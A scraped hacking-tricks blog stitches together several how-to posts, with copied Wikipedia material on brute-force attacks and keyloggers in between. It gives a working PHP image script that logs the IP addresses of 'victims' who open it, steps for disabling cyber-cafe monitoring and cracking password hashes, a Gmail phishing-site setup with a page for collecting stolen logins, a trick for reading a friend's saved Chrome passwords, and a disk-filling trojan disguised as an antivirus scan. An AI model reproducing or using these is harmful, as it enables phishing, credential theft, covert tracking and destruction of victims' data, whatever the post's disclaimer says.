latest articles
How to grab someone IP address ?
How to grab someone IP address ?
I will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.
- Copy the below codes into Notepad and save it as Grab.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
Change your Ip in less then 1 minute
Change your Ip in less then 1 minute
In my previous post i had show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.
- Click on "Start" in the bottom left corner of the screen.
- Click on "RUN"
- Type in "command" and click OK
You should be now at MSDOS prompt Screen
- Type "ipconfig /release" just like that, and press "enter"
- Type "exit" and leave the prompt
- Right-click on "Network Places" or "My Network Places" on your desktop.
- Click on "properties"
Now you should be on a screen with something titled "Local Area Connection", or something similar to that, and, if you have a network hooked up, all of your other networks.
- Right click on "Local Area Connection" and click "properties"
- Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
- Click on "Use the following IP address" under the "General" tab
- Create an IP address (It doesn't matter what it is)
- Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
- Press the "Ok" button here
- Hit the "Ok" button again
Now you should be back to the "Local Area Connection" screen.
- Right-click back on "Local Area Connection" and go to properties again.
- Go back to the "TCP/IP" settings
- This time, select "Obtain an IP address automatically"
- Click on "Ok"
- Hit "Ok" again.
- Now you have a New IP address.
More Simple Way To View Saved Password in Google Chrome
More Simple Way To View Saved Password in Google Chrome
|
Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull to view or hack saved password in google chrome. It does not matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.
How to view saved password in google chrome ?
- Open Google Chrome
- Go to Settings (Its on the Right Corner)
- Then Click on Advance Settings
- Scroll Down and their will be password and forms from their click on Manage saved password.
- Then list of all websites whose passwords are saved on browser will be listed.
- Click on show to view those passwords
- Enjoy!!
OPERA MINI FREE AIRTEL GPRS TRICK
OperaMini Free Airtel Gprs Tricks April 2012
Hello To All Friends After My Super Popular Trick
Optimizing Internet Connection Using Internet Cyclone - Increase Internet Speed in Windows
. Our Team Will Tell You About Free Gprs Trick April 2012 on Airtel . I am give you Free Airtel Gprs Tricks . How To Hack Airtel Gprs Using OperaMini ? Ok Let's Follow Some Few Steps For Do This .1. First You Need Create New Setting In Your Mobile Phone
Apn - airtelgprs.com
Proxy Address - 141.000.011.253
Port - 80
2. Now You Open Operamini Handler And Use Following Given Below Settings
Proxy Type - Http
Proxy - mocricket.com Or fb.me
That's it Now You Are Done .
This Trick Are Already tested and working fine in rajasthan . Please Let's Check in your State Also
boost torrent speed
Trick To Boost Torrent Speeds Using UTorrent Turbo Booster Plugin
uTorrent Turbo Booster is a recent plug-in designed to improve the
functionality of probably the most popular P2P file sharing application
around – uTorrent.
This tool comes equipped with modern technology that
aims at getting your download speed way up so you can grab the files you
want so badly much quicker than you’ve been used to. Movies, music,
games, applications, you name it - uTorrent Turbo Booster will deliver
at a fast pace. It will be there doing its job in the background without
upsetting any other activity you might perform on your computer.hack cyber cafe
How To Hack PC On Cyber Cafe | Hack A Closed Pc On Cyber Cafe
here is a quick new hack on how to intrude in the PC which is shut downed at Cyber cafe. (Don’t Forget to read our disclaimer at the bottom of the post.)
1. As you all must have know these days all Cyber cafe owners have a
program for administration to control all PC’s in local area network. So
all files can be inter transmitted.
2. First of all press Ctrl+Alt+Del the task manager or any
controlling application, will open. Then from APPLICATIONS select the
program that is controlling all PC’s & terminate it, This is for
security reason. Now log of PC, & you ll get user names of the PC.
3. But some times, cyber cafes have security clients installed that
have restricted access to Task Manager
, restart the computer & press
F8 continuously before windows boots.
The Menu will open, select Safe Mode from it. And now you can copy files from networked PC’s without any security layer.
Next step is where you’ll need to crack the hashes. SO go to your
home PC , Download & install Saminside cracking tool. And from some
another Cyber cafe try to crack the hashes of that PC. By same log off
method explained below.
This where you actually perform hacking. Have a gret time & tell us weather it worked for you.
Meanwhile if you can get IP address, of the PC you wish to hack try
to get it from ip-explorer.com, but this is not the part of this hack
its sort of next step of hacking from outside the network.
Disclaimer : The trick here explained it
for educational purpose only & not to perform illegal or criminal
activities. Don’t forget hacking into some one’s privacy is considered
as crime. SO do it on your home network that you own or something. We
are not responsible for anything you do & consequences of it by
using our articles.How to Transfer Windows Files - Images - Settings Easily
Have you purchased a new PC or shifted to an old one but all the data stuff is in your previous PC, well than that’s not a big problem because we have Windows Easy Transfer official transfer tool by Microsoft well with this you transfer files, pictures, images and settings to any new windows operated pc The best thing about this tool is that it also includes a file explorer or you can say file manager which you see many times on a Nokia phone so you can also see what things to copy and what not.
This
tool is official developed by Microsoft for their humble customers,
giving them an easy way to complete the whole process. Check below steps
on how to use this awesome simple tool.
- Download Windows Easy Transfer Tool.
- Now just run this tool on your old pc from which you are willing to transfer your files and settings. You can choose to backup settings in your external drive such as pen drives.
- Now just run this tool again on your new pc and choose the file from external drive to restore the whole process in your new pc.
brute force attack
abhinav karthik,
abhinav karthik r,
fry junk,
fry junkz,
fryjunkz,
gvhss payyoli,
hacker,
hacking,
how to hack,
karthik,
teanagers hacking team,
www.fryjunk.blogspot.in,
www.fryjunk.co.cc
0
comments
Brute-force attack
In cryptography, a brute-force attack, or exhaustive key search, is a cryptanalytic attack that can, in theory, be used against any encrypted data[1] (except for data encrypted in an information-theoretically secure manner). Such an attack might be utilized when it is not possible to take advantage of other weaknesses in an encryption system (if any exist) that would make the task easier. It consists of systematically checking all possible keys until the correct key is found. In the worst case, this would involve traversing the entire search space.
The key length used in the cipher determines the practical feasibility of performing a brute-force attack, with longer keys exponentially more difficult to crack than shorter ones. A cipher with a key length of N bits can be broken in a worst-case time proportional to 2N and an average time of half that. Brute-force attacks can be made less effective by obfuscating the data to be encoded, something that makes it more difficult for an attacker to recognise when he/she has cracked the code. One of the measures of the strength of an encryption system is how long it would theoretically take an attacker to mount a successful brute-force attack against it.
Brute-force attacks are an application of brute-force search, the general problem-solving technique of enumerating all candidates and checking each one.
Theoretical limits
The resources required for a brute-force attack grow exponentially with increasing key size, not linearly. Although US export regulations historically restricted key lengths to 56-bit symmetric keys (e.g. Data Encryption Standard), these restrictions are no longer in place, so modern symmetric algorithms typically use computationally stronger 128- to 256-bit keys.There is a physical argument that a 128-bit symmetric key is computationally secure against brute-force attack. The so-called Landauer limit implied by the laws of physics sets a lower limit on the energy required to perform a computation of kT · ln 2 per bit erased in a computation, where T is the temperature of the computing device in kelvins, k is the Boltzmann constant, and the natural logarithm of 2 is about 0.693. No irreversible computing device can use less energy than this, even in principle.[2] Thus, in order to simply flip through the possible values for a 128-bit symmetric key (ignoring doing the actual computing to check it) would theoretically require 2128 − 1 bit flips on a conventional processor. If it is assumed that the calculation occurs near room temperature (~300 K) the Von Neumann-Landauer Limit can be applied to estimate the energy required as ~1018 joules, which is equivalent to consuming 30 gigawatts of power for one year. This is equal to 30×109 W×365×24×3600 s = 9.46×1017 J or 262.7 TWh (more than 1/100th of the world energy production). The full actual computation—checking each key to see if you have found a solution—would consume many times this amount.
However, this argument assumes that the register values are changed using conventional set and clear operations which inevitably generate entropy. It has been shown that computational hardware can be designed not to encounter this theoretical obstruction (see reversible computing), though no such computers are known to have been constructed.[citation needed]
As commercial available successors of governmental ASICs Solution also known as custom hardware attack, today two emerging technologies have proven their capability in the brute-force attack of certain ciphers. One is modern graphics processing unit (GPU) technology,[3][page needed] the other is the field-programmable gate array (FPGA) technology. GPUs benefit from their wide availability and price-performance benefit, FPGAs from their energy efficiency per cryptographic operation. Both technologies try to transport the benefits of parallel processing to brute-force attacks. In case of GPUs some hundreds, in the case of FPGA some thousand processing units making them much better suited to cracking passwords than conventional processors. Various publications in the fields of cryptographic analysis have proved the energy efficiency of today’s FPGA technology, for example, the COPACOBANA FPGA Cluster computer consumes the same energy as a single PC (600 W), but performs like 2,500 PCs for certain algorithms. A number of firms provide hardware-based FPGA cryptographic analysis solutions from a single FPGA PCI Express card up to dedicated FPGA computers.[citation needed] WPA and WPA2 encryption have successfully been brute-force attacked by reducing the workload by a factor of 50 in comparison to conventional CPUs[4][5] and some hundred in case of FPGAs.
AES permits the use of 256-bit keys. Breaking a symmetric 256-bit key by brute force requires 2128 times more computational power than a 128-bit key. A device that could check a billion billion (1018) AES keys per second (if such a device could ever be made - as of 2012, supercomputers have computing capacities of 20 Peta-FLOPS, see Titan. So 50 supercomputers would be required to process (1018) operations per second) would in theory require about 3×1051 years to exhaust the 256-bit key space.
An underlying assumption of a brute-force attack is that the complete keyspace was used to generate keys, something that relies on an effective random number generator, and that there are no defects in the algorithm or its implementation. For example, a number of systems that were originally thought to be impossible to crack by brute force have nevertheless been cracked because the key space to search through was found to be much smaller than originally thought, because of a lack of entropy in their pseudorandom number generators. These include Netscape's implementation of SSL (famously cracked by Ian Goldberg and David Wagner in 1995[6]) and a Debian/Ubuntu edition of OpenSSL discovered in 2008 to be flawed.[7] A similar lack of implemented entropy lead to the breaking of Enigma's code.[8][9]
Credential recycling
Credential recycling refers to the hacking practice to re-use username and password combinations gathered in previous brute-force attacks. A special form of credential recycling is pass the hash, where unsalted hashed credentials are stolen and re-used without first being brute forced.Unbreakable codes
Certain types of encryption, by their mathematical properties, cannot be defeated by brute force. An example of this is one-time pad cryptography, where every cleartext bit has a corresponding key from a truly random sequence of key bits. A 140 character one-time-pad–encoded string subjected to a brute-force attack would eventually reveal every 140 character string possible, including the correct answer - but of all the answers given, there would be no way of knowing which was the correct one. Defeating such a system, as was done by the Venona project, generally relies not on pure cryptography, but upon mistakes in its implementation: the key pads not being truly random, intercepted keypads, operators making mistakes - or other errors.[10]Countermeasures
In case of an offline attack where the attacker has access to the encrypted material, he can try key combinations at his leisure without the risk of discovery or interference. However database and directory administrators can take countermeasures against online attacks, for example by limiting the number of attempts that a password can be tried, by introducing time delays between successive attempts, increasing the answer's complexity (e.g. requiring a CAPTCHA answer or verification code sent via cellphone), and/or locking accounts out after unsuccessful logon attempts.[11][page needed] Website administrators may prevent a particular IP address from trying more than a predetermined number of password attempts against any account on the site.[12]Reverse brute-force attack
In a reverse brute-force attack, a single (usually common) password is tested against multiple usernames or encrypted files.[13] The process may be repeated for a select few passwords. In such a strategy, the attacker is generally not targeting a specific user. Reverse brute-force attacks can be mitigated by establishing a password policy that disallows common passwords.[ciwhat is key logging
abhinav karthik,
abhinav karthik r,
fry junk,
fry junkz,
fryjunkz,
gvhss payyoli,
hacker,
hacking,
how to hack,
karthik,
teanagers hacking team,
www.fryjunk.blogspot.in,
www.fryjunk.co.cc
0
comments
Keystroke logging
From Wikipedia, the free encyclopedia
Jump to: navigation, search
Keystroke logging (more often called keylogging or "keyloggers") is the action of tracking (or logging) the keys struck on a keyboard,
typically in a covert manner so that the person using the keyboard is
unaware that their actions are being monitored. It also has very
legitimate uses in studies of human-computer interaction. There are
numerous keylogging methods, ranging from hardware and software-based
approaches to electromagnetic and acoustic analysis.Application
Software-based keyloggers
These are software programs designed to work on the target computer’s operating system. From a technical perspective there are five categories:- Hypervisor-based: The keylogger can theoretically reside in a malware hypervisor running underneath the operating system, which remains untouched. It effectively becomes a virtual machine. Blue Pill is a conceptual example.
- Kernel-based: This method is difficult both to write and to combat. Such keyloggers reside at the kernel level and are thus difficult to detect, especially for user-mode applications. They are frequently implemented as rootkits that subvert the operating system kernel and gain unauthorized access to the hardware, making them very powerful. A keylogger using this method can act as a keyboard device driver for example, and thus gain access to any information typed on the keyboard as it goes to the operating system.
- API-based: These keyloggers hook keyboard APIs;
the operating system then notifies the keylogger each time a key is
pressed and the keylogger simply records it. Windows APIs such as
GetAsyncKeyState()
,GetForegroundWindow()
, etc. are used to poll the state of the keyboard or to subscribe to keyboard events.[1] These types of keyloggers are the easiest to write, but where constant polling of each key is required, they can cause a noticeable increase in CPU usage, and can also miss the occasional key. A more recent example simply polls the BIOS for pre-boot authentication PINs that have not been cleared from memory.[2] - Form grabbing based: Form grabbing-based keyloggers log web form submissions by recording the web browsing onsubmit event functions. This records form data before it is passed over the Internet and bypasses HTTPS encryption.
- Memory injection based: Memory Injection (MitB)-based keyloggers alter memory tables associated with the browser and other system functions to perform their logging functions. By patching the memory tables or injecting directly into memory, this technique can be used by malware authors who are looking to bypass Windows UAC (User Account Control). The Zeus and Spyeye Trojans use this method exclusively.[citation needed]
- Packet analyzers: This involves capturing network traffic associated with HTTP POST events to retrieve unencrypted passwords.
- Data is uploaded to a website, database or an FTP server.
- Data is periodically emailed to a pre-defined email address.
- Data is wirelessly transmitted by means of an attached hardware system.
- The software enables a remote login to the local machine from the Internet or the local network, for data logs stored on the target machine to be accessed.
Related features
Software keyloggers may be augmented with features that capture user information without relying on keyboard key presses as the sole input. Some of these features include:- Clipboard logging. Anything that has been copied to the clipboard can be captured by the program.
- Screen logging. Screenshots are taken in order to capture graphics-based information. Applications with screen logging abilities may take screenshots of the whole screen, just one application or even just around the mouse cursor. They may take these screenshots periodically or in response to user behaviours (for example, when a user has clicked the mouse). A practical application used by some keyloggers with this screen logging ability is to take small screenshots around where a mouse has just clicked; these defeat web-based keyboards (for example, the web-based screen keyboards that are often used by banks) and any web-based on-screen keyboard without screenshot protection.
- Programmatically capturing the text in a control. The Microsoft Windows API allows programs to request the text 'value' in some controls. This means that some passwords may be captured, even if they are hidden behind password masks (usually asterisks).[3]
- The recording of every program/folder/window opened including a screenshot of each and every website visited, also including a screenshot of each.
- The recording of search engines queries, instant messenger conversations, FTP downloads and other Internet-based activities (including the bandwidth used).
Hardware-based keyloggers
Main article: Hardware keylogger
Hardware-based keyloggers do not depend upon any software being
installed as they exist at a hardware level in a computer system.- Firmware-based: BIOS-level firmware that handles keyboard events can be modified to record these events as they are processed. Physical and/or root-level access is required to the machine, and the software loaded into the BIOS needs to be created for the specific hardware that it will be running on.[4]
- Keyboard hardware: Hardware keyloggers are used for keystroke logging by means of a hardware circuit that is attached somewhere in between the computer keyboard and the computer, typically inline with the keyboard's cable connector. More stealthy implementations can be installed or built into standard keyboards, so that no device is visible on the external cable. Both types log all keyboard activity to their internal memory, which can be subsequently accessed, for example, by typing in a secret key sequence.[5] A hardware keylogger has an advantage over a software solution: it is not dependent on being installed on the target computer's operating system and therefore will not interfere with any program running on the target machine or be detected by any software. However its physical presence may be detected if, for example, it is installed outside the case as an inline device between the computer and the keyboard. Some of these implementations have the ability to be controlled and monitored remotely by means of a wireless communication standard.[6]
- Wireless keyboard sniffers: These passive sniffers collect packets of data being transferred from a wireless keyboard and its receiver. As encryption may be used to secure the wireless communications between the two devices, this may need to be cracked beforehand if the transmissions are to be read.
- Keyboard overlays: Criminals have been known to use keyboard overlays on ATMs to capture people's PINs. Each keypress is registered by the keyboard of the ATM as well as the criminal's keypad that is placed over it. The device is designed to look like an integrated part of the machine so that bank customers are unaware of its presence.[7]
- Acoustic keyloggers: Acoustic cryptanalysis can be used to monitor the sound created by someone typing on a computer. Each key on the keyboard makes a subtly different acoustic signature when struck. It is then possible to identify which keystroke signature relates to which keyboard character via statistical methods such as frequency analysis. The repetition frequency of similar acoustic keystroke signatures, the timings between different keyboard strokes and other context information such as the probable language in which the user is writing are used in this analysis to map sounds to letters.[8] A fairly long recording (1000 or more keystrokes) is required so that a big enough sample is collected.[9]
- Electromagnetic emissions: It is possible to capture the electromagnetic emissions of a wired keyboard from up to 20 metres (66 ft) away, without being physically wired to it.[10] In 2009, Swiss researches tested 11 different USB, PS/2 and laptop keyboards in a semi-anechoic chamber and found them all vulnerable, primarily because of the prohibitive cost of adding shielding during manufacture.[11] The researchers used a wide-band receiver to tune into the specific frequency of the emissions radiated from the keyboards.
- Optical surveillance: Optical surveillance, while not a keylogger in the classical sense, is nonetheless an approach that can be used to capture passwords or PINs. A strategically placed camera, such as a hidden surveillance camera at an ATM, can allow a criminal to watch a PIN or password being entered.[12]
- Physical evidence: For a keypad that is used only to enter a security code, the keys which are in actual use will have evidence of use from many fingerprints. A passcode of four digits, if the four digits in question are known, is reduced from 10,000 possibilities to just 24 possibilities. These could then be used on separate occasions for a manual "brute force attack."
History
An early keylogger was written by Perry Kivolowitz and posted to the Usenet news group net.unix-wizards,net.sources on November 17, 1983.[13] The posting seems to be a motivating factor in restricting access to /dev/kmem on Unix systems. The user-mode program operated by locating and dumping character lists (clists) as they were assembled in the Unix kernel.Cracking
Writing simple software applications for keylogging can be trivial, and like any nefarious computer program, can be distributed as a trojan horse or as part of a virus. What is not trivial for an attacker, however, is installing a covert keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.Trojan
Young and Yung devised several methods for solving this problem and presented them in their 1997 IEEE Security & Privacy paper[14] (their paper from 1996 touches on it as well).[citation needed] They presented a deniable password snatching attack in which the keystroke logging trojan is installed using a virus or worm. An attacker who is caught with the virus or worm can claim to be a victim. The cryptotrojan asymmetrically encrypts the pilfered login/password pairs using the public key of the trojan author and covertly broadcasts the resulting ciphertext. They mentioned that the ciphertext can be steganographically encoded and posted to a public bulletin board such as Usenet.[citation needed]Ciphertext
Young and Yung also mentioned having the cryptotrojan unconditionally write the asymmetric ciphertexts to the last few unused sectors of every writable disk that is inserted into the machine.[citation needed] The sectors remain marked as unused. This can be done using a USB token. So, the trojan author may be one of dozens or even thousands of people who are given the stolen information. Only the trojan author can decrypt the ciphertext because only the author knows the needed private decryption key. This attack is from the field known as cryptovirology.Use by police
In 2000, the FBI used a keystroke logger to obtain the PGP passphrase of Nicodemo Scarfo, Jr., son of mob boss Nicodemo Scarfo.[15] Also in 2000, the FBI lured two suspected Russian cyber criminals to the US in an elaborate ruse, and captured their usernames and passwords with a keylogger that was covertly installed on a machine that they used to access their computers in Russia. The FBI then used these credentials to hack into the suspects' computers in Russia in order to obtain evidence to prosecute them.[16]Countermeasures
The effectiveness of countermeasures varies, because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. For example, an on-screen keyboard will be effective against hardware keyloggers, transparency will defeat some screenloggers - but not all - and an anti-spyware application that can only disable hook-based keyloggers will be ineffective against kernel-based keyloggers.Also, keylogger software authors may be able to update the code to adapt to countermeasures that may have proven to be effective against them.
Anti keyloggers
Main article: Anti keylogger
An anti keylogger is a piece of software
specifically designed to detect keyloggers on a computer, typically
comparing all files in the computer against a database of keyloggers
looking for similarities which might signal the presence of a hidden
keylogger. As anti keyloggers have been designed specifically to detect
keyloggers, they have the potential to be more effective than
conventional anti virus software; some anti virus software do not
consider certain keyloggers a virus, as under some circumstances a
keylogger can be considered a legitimate piece of software.[citation needed]Live CD/USB
Rebooting the computer using a Live CD or write-protected Live USB is a possible countermeasure against software keyloggers if the CD is clean of malware and the operating system contained on it is secured and fully patched so that it cannot be infected as soon as it is started. Booting a different operating system does not impact the use of a hardware or BIOS based keylogger.Anti-spyware / Anti-virus programs
Many anti-spyware applications are able to detect some software keyloggers and quarantine, disable or cleanse them. However, because many keylogging programs are legitimate piece of software under some circumstances, anti spyware often neglects to label keylogging programs as spyware or a virus. These applications are able to detect software-based keyloggers based on patterns in executable code, heuristics and keylogger behaviours (such as the use of hooks and certain APIs).No software-based anti-spyware application can be 100% effective against all keyloggers[citation needed]. Also, software-based anti-spyware cannot defeat non-software keyloggers (for example, hardware keyloggers attached to keyboards will always receive keystrokes before any software-based anti-spyware application).
However, the particular technique that the anti-spyware application uses will influence its potential effectiveness against software keyloggers. As a general rule, anti-spyware applications with higher privileges will defeat keyloggers with lower privileges. For example, a hook-based anti-spyware application cannot defeat a kernel-based keylogger (as the keylogger will receive the keystroke messages before the anti-spyware application), but it could potentially defeat hook- and API-based keyloggers.
Network monitors
Network monitors (also known as reverse-firewalls) can be used to alert the user whenever an application attempts to make a network connection. This gives the user the chance to prevent the keylogger from "phoning home" with his or her typed information.Automatic form filler programs
Main article: Form filler
Automatic form-filling programs may prevent keylogging by removing
the requirement for a user to type personal details and passwords using
the keyboard. Form fillers are primarily designed for web browsers to fill in checkout pages and log users into their accounts. Once the user's account and credit card information has been entered into the program, it will be automatically entered into forms without ever using the keyboard or clipboard,
thereby reducing the possibility that private data is being recorded.
However someone with physical access to the machine may still be able to
install software that is able to intercept this information elsewhere
in the operating system or while in transit on the network. (Transport Layer Security (TLS) prevents the interception of data in transit by network sniffers and proxy tools.)One-time passwords (OTP)
Using one-time passwords may be keylogger-safe, as each password is invalidated as soon as it's used. This solution may be useful for someone using a public computer, however an attacker who has remote control over such a computer can simply wait for the victim to enter his/her credentials before performing unauthorised transactions on their behalf while their session is active.Security tokens
Use of smart cards or other security tokens may improve security against replay attacks in the face of a successful keylogging attack, as accessing protected information would require both the (hardware) security token as well as the appropriate password/passphrase. Knowing the keystrokes, mouse actions, display, clipboard etc. used on one computer will not subsequently help an attacker gain access to the protected resource. Some security tokens work as a type of hardware-assisted one-time password system, and others implement a cryptographic challenge-response authentication, which can improve security in a manner conceptually similar to one time passwords. Smartcard readers and their associated keypads for PIN entry may be vulnerable to keystoke logging through a so-called supply chain attack[17] where an attacker substitutes the card reader/PIN entry hardware for one which records the user's PIN.On-screen keyboards
Most on screen keyboards (such as the onscreen keyboard that comes with Windows XP) send normal keyboard event messages to the external target program to type text. Every software keylogger can log these typed characters sent from one program to another.[18] Additionally, keylogging software can take screenshots of what is displayed on the screen (periodically, and/or upon each mouse click), which means that although certainly a useful security measure, an on-screen keyboard will not protect from all keyloggers.Keystroke interference software
Keystroke interference software is also available.[19] These programs attempt to trick keyloggers by introducing random keystrokes, although this simply results in the keylogger recording more information than it needs to. An attacker has the task of extracting the keystrokes of interest—the security of this mechanism, specifically how well it stands up to cryptanalysis, is unclear.Speech recognition
Similar to on-screen keyboards, speech-to-text conversion software can also be used against keyloggers, since there are no typing or mouse movements involved. The weakest point of using voice-recognition software may be how the software sends the recognized text to target software after the recognition took place.Handwriting recognition and mouse gestures
Also, many PDAs and lately tablet PCs can already convert pen (also called stylus) movements on their touchscreens to computer understandable text successfully. Mouse gestures utilize this principle by using mouse movements instead of a stylus. Mouse gesture programs convert these strokes to user-definable actions, such as typing text. Similarly, graphics tablets and light pens can be used to input these gestures, however these are less common everyday.The same potential weakness of speech recognition applies to this technique as well.
Macro expanders/recorders
With the help of many programs, a seemingly meaningless text can be expanded to a meaningful text and most of the time context-sensitively, e.g. "en.wikipedia.org" can be expanded when a web browser window has the focus. The biggest weakness of this technique is that these programs send their keystrokes directly to the target program. However, this can be overcome by using the 'alternating' technique described below, i.e. sending mouse clicks to non-responsive areas of the target program, sending meaningless keys, sending another mouse click to target area (e.g. password field) and switching back-and-forth.Non-technological methods
Alternating between typing the login credentials and typing characters somewhere else in the focus window[20] can cause a keylogger to record more information than they need to, although this could easily be filtered out by an attacker. Similarly, a user can move their cursor using the mouse during typing, causing the logged keystrokes to be in the wrong order e.g., by typing a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter. Lastly, someone can also use context menus to remove, cut, copy, and paste parts of the typed text without using the keyboard. An attacker who is able to capture only parts of a password will have a smaller key space to attack if he chose to execute a brute-force attack.Another very similar technique utilizes the fact that any selected text portion is replaced by the next key typed. E.g., if the password is "secret", one could type "s", then some dummy keys "asdfsd". Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies "asdfsd".
These techniques assume incorrectly that keystroke logging software cannot directly monitor the clipboard, the selected text in a form, or take a screenshot every time a keystroke or mouse click occurs. They may however be effective against some hardware keyloggers
what is back door
abhinav karthik,
abhinav karthik r,
fry junk,
fry junkz,
fryjunkz,
gvhss payyoli,
hacker,
hacking,
how to hack,
karthik,
teanagers hacking team,
www.fryjunk.blogspot.in,
www.fryjunk.co.cc
0
comments
back door
Whether installed as an administrative tool or a means of attack, a back door is a security risk, because there are always crackers out there looking for any vulnerability to exploit. In her article "Who gets your trust?" security consultant Carole Fennelly uses an analogy to illustrate the situation: "Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it."
gmail phishing
abhinav karthik,
abhinav karthik r,
fry junk,
fry junkz,
fryjunkz,
gvhss payyoli,
hacker,
hacking,
how to hack,
karthik,
teanagers hacking team,
www.fryjunk.blogspot.in,
www.fryjunk.co.cc
0
comments
gmail phishing
First I have shown you people how to set up Facebook Phishing site , In this Tutorial I will show you how to set up Gmail Phishing site, step by step with pictures.
Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)
Step 2: Now Goto your email account that you gave and confirm your account with confirmation link
Step 3: Now Download this FILE (http://adf.ly/9zLzx ) .
Step 4: Now Goto http://members.000webhost.com/ and Log into your account.
Step 5: Now when you are logged into your account click on the Go to Cpanel in front of your domain that you had registered, and then Go to File Manager under Files and log into it.
.
Step 6: Now Click on the Public_html.
Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.
Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.
NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:
http://www.yoursitesadress.p4o.net/lol.html
If I am not clear in any point Please ask me in comments below.
create trojan horse
abhinav karthik,
abhinav karthik r,
fry junk,
fry junkz,
fryjunkz,
gvhss payyoli,
hacker,
hacking,
how to hack,
karthik,
teanagers hacking team,
www.fryjunk.blogspot.in,
www.fryjunk.co.cc
0
comments
How to Make a Trojan Horse
Most of you may be curious to know about how to make a Trojan or Virus on your own. Well, here is an answer to your curiosity. In this, post I’ll show you how to make a simple trojan on your own using
C programming language. This trojan when executed will eat up the hard
disk space on the root drive (The drive on which the Windows is
installed, usually C: Drive) of the computer on which it is run. Also,
this trojan works pretty quickly and is capable of eating up
approximately 1 GB of hard disk space for every minute it is run.
So, I’ll call this as Space Eater
Trojan. Since this program is written using a high level programming
language, it is often undetected by antivirus programs. The source code
for this program is available for download at the end of this
post. Let’s see how this trojan works:
Before I move on to explain the working of this program, you need to know what exactly is a Trojan horse
and how it works. Unlike what many of us think, a trojan horse is not a
virus. In simple words, it is just a program that appears to do
a favorable task but in reality performs undisclosed malicious functions
that allow the attacker to gain unauthorized access to the host machine
or cause a damage to the computer.
Now lets move to the working of our Trojan:
The trojan horse which I have created
appears itself as an antivirus program that scans the computer for
malware programs. However, in reality it does nothing other than eating
up the hard disk space on the root drive by filling it up with a huge
junk file. The rate at which it fills up the hard disk space it too
high. As a result, the the root drive gets filled up completely with in
minutes of running this program.
Once the disk space is full, the trojan
reports that the scan is complete. The victim will not be able to clean
up the hard disk space using any of the cleanup program. This is
because, the trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll
extension it is often ignored by the disk cleanup software. Hence there
is now way to recover the hard disk space other than reformatting the
drive.
The algorithm of the Trojan is as follows:
-
Search for the root drive.
-
Navigate to %systemroot%\Windows\System32 on the root drive.
-
Create the file named “spceshot.dll“.
-
Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full.
-
Once the drive is full, stop the process.
You can download the Trojan source code HERE. Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.
How to compile, test and fix the damage?
Compilation:
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing:
To test the trojan, just run the SpaceEater.exe
file on your computer. It will generate a warning message at the
beginning. Once you accept it, the Trojan runs and eats up the hard disk
space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to fix the damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box:
%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
NOTE:
You can also change the ICON of the virus to make it look like a
legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?
Subscribe to:
Posts (Atom)